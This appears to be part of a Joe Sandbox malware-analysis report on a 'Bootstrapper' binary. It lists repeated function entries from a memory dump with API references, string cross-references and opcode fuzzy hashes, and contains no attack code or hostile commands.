Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 46ac136d96b6bd6b13f851f3787d9b8b31897c68498e5dfbe0bd3c3b82a6452a
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: 46ac136d96b6bd6b13f851f3787d9b8b31897c68498e5dfbe0bd3c3b82a6452a
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: a3e90d89bec4e71e4a8ae45780b5999cab231686fb1d12cf114ec8d0eea7e4d8
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: a3e90d89bec4e71e4a8ae45780b5999cab231686fb1d12cf114ec8d0eea7e4d8
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: e8336e48d99074bd84d107bc7db81d886b585c851db814827b67175b15e4df98
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: e8336e48d99074bd84d107bc7db81d886b585c851db814827b67175b15e4df98
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: d0a0d2ee7dbb9b21e739e27a7ab563fb40f687698faa31d0a73f4ae8db732cde
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: d0a0d2ee7dbb9b21e739e27a7ab563fb40f687698faa31d0a73f4ae8db732cde
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: da0f33cd1f0cf5a6b1fb3dc5f9485f8af8d89dd78d592e25e3e7e135ba550c40
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: da0f33cd1f0cf5a6b1fb3dc5f9485f8af8d89dd78d592e25e3e7e135ba550c40
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 85165d6f684004f0153270e43041af3252343194f79a8782280afe0d4edf3d74
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: 85165d6f684004f0153270e43041af3252343194f79a8782280afe0d4edf3d74
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: 28530365780b5150a9edc2e38cf053ab8c15db8b6bf46c57c88a338e9af58ccf
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: 28530365780b5150a9edc2e38cf053ab8c15db8b6bf46c57c88a338e9af58ccf
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

, xrefs: 00E1E1DD

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-3618818622
Opcode ID: d334d90a603b2dc6a39144c1fd8ec6b795a7d4fe83f843aebf2d93cac0ed87c7
Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
Opcode Fuzzy Hash: d334d90a603b2dc6a39144c1fd8ec6b795a7d4fe83f843aebf2d93cac0ed87c7
Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830

Function 00E1E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E580

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

Fjun, xrefs: 00E1E57A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun
API String ID: 1269201914-1717936292
Opcode ID: a564e80c3c29c832b570d653396bed0aa4143d068112b7ce0debac75a7a49ad9
Instruction ID: 57ea32f08cd108849e139c8f8d326aaa4a7b66c817cd98593b391720f3177f13
Opcode Fuzzy Hash: a564e80c3c29c832b570d653396bed0aa4143d068112b7ce0debac75a7a49ad9
Instruction Fuzzy Hash: 08A011E2AA8202BC300822A02C0BCBB028EC8C0F20330B82EFC02B0280A88008820830

Function 00E1E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E580

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

Fjun, xrefs: 00E1E57A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun
API String ID: 1269201914-1717936292
Opcode ID: 3a0171e87098a6aacaf451cc710fef1d7d10842d732f73b0f5932f9653ad3a5f
Instruction ID: 57ea32f08cd108849e139c8f8d326aaa4a7b66c817cd98593b391720f3177f13
Opcode Fuzzy Hash: 3a0171e87098a6aacaf451cc710fef1d7d10842d732f73b0f5932f9653ad3a5f
Instruction Fuzzy Hash: 08A011E2AA8202BC300822A02C0BCBB028EC8C0F20330B82EFC02B0280A88008820830

Function 00E1E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<
API String ID: 1269201914-576538559
Opcode ID: fcbcb7acaaf1f29daa035b0fd80ba4be5d986dbf4f2a1d70770be489a189f42d
Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
Opcode Fuzzy Hash: fcbcb7acaaf1f29daa035b0fd80ba4be5d986dbf4f2a1d70770be489a189f42d
Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30

Function 00E1E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E580

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

Fjun, xrefs: 00E1E57A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun
API String ID: 1269201914-1717936292
Opcode ID: af17664e9d2caa8e79bf59642ecff7dc79f6a07131e1bacc291b6ea8e182a8dd
Instruction ID: 9e61e4c0858a4a18d9f9c19354b22a9a012dcb945b0b203501bffb01b5396233
Opcode Fuzzy Hash: af17664e9d2caa8e79bf59642ecff7dc79f6a07131e1bacc291b6ea8e182a8dd
Instruction Fuzzy Hash: 26A011E2AA82003C300822A02C0BCBB0A8EC8C0F22330B22EFC00B0280A88008820830

Function 00E1E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<
API String ID: 1269201914-576538559
Opcode ID: 28ec5eba7d66562ccb3cee51ed2c7500471038833aac0ce76cb3d39ce89b8b63
Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
Opcode Fuzzy Hash: 28ec5eba7d66562ccb3cee51ed2c7500471038833aac0ce76cb3d39ce89b8b63
Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30

Function 00E1E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<
API String ID: 1269201914-576538559
Opcode ID: ca7c500c8c6311083525eb927d3e5157edb21a88fae1a2a56392d1f6d7292738
Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
Opcode Fuzzy Hash: ca7c500c8c6311083525eb927d3e5157edb21a88fae1a2a56392d1f6d7292738
Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30

Function 00E1E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

PDu<, xrefs: 00E1E519

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<
API String ID: 1269201914-576538559
Opcode ID: 8a995cea9eef4b2d93fdbc9ec183fe9b06f70943c9a4a65ee048475c090ddff8
Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
Opcode Fuzzy Hash: 8a995cea9eef4b2d93fdbc9ec183fe9b06f70943c9a4a65ee048475c090ddff8
Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30

Function 00E2BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00E2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E2BA44,?), ref: 00E2B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E2BA89,?,00000000), ref: 00E2BC64
GetCPInfo.KERNEL32(00000000,00E2BA89,?,?,?,00E2BA89,?,00000000), ref: 00E2BC77

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 1dcea1c091da1ea0d4c8cfbab0bfbde1f5ff30f595cdd7aee10dbbe0d1a38987
Instruction ID: 83a67bbee4c19ca457e8c4eec935fafcb5aac4917b281a97f08f86982a61a0fc
Opcode Fuzzy Hash: 1dcea1c091da1ea0d4c8cfbab0bfbde1f5ff30f595cdd7aee10dbbe0d1a38987
Instruction Fuzzy Hash: EF516470A002659EDB248F71E8816FBFBF4EF41304F1864AED496BB292D7359946CB90

Function 00E09A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00E09A50,?,?,00000000,?,?,00E08CBC,?), ref: 00E09BAB
GetLastError.KERNEL32(?,00000000,00E08411,-00009570,00000000,000007F3), ref: 00E09BB6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
